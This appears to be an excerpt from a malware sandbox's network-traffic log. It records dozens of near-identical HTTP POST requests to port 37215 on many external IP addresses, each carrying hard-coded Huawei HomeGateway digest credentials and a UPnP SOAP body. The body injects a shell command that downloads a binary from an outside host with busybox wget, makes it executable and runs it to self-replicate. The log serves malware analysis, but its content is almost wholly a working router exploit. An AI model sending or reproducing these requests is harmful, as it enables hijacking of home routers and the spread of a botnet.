2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  917192.168.2.135740294.95.216.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.444760084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  918192.168.2.1349726153.104.116.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445255995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  919192.168.2.1335056157.54.89.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445378065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  920192.168.2.135988057.255.81.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445389986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  921192.168.2.1340258197.54.21.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445411921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  922192.168.2.135799641.155.214.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445446968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  923192.168.2.1356794197.186.237.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445576906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  924192.168.2.1360704120.206.7.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445594072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  925192.168.2.1334272157.230.171.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445643902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  926192.168.2.1351630197.40.7.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445663929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  927192.168.2.135781841.134.116.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.445674896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
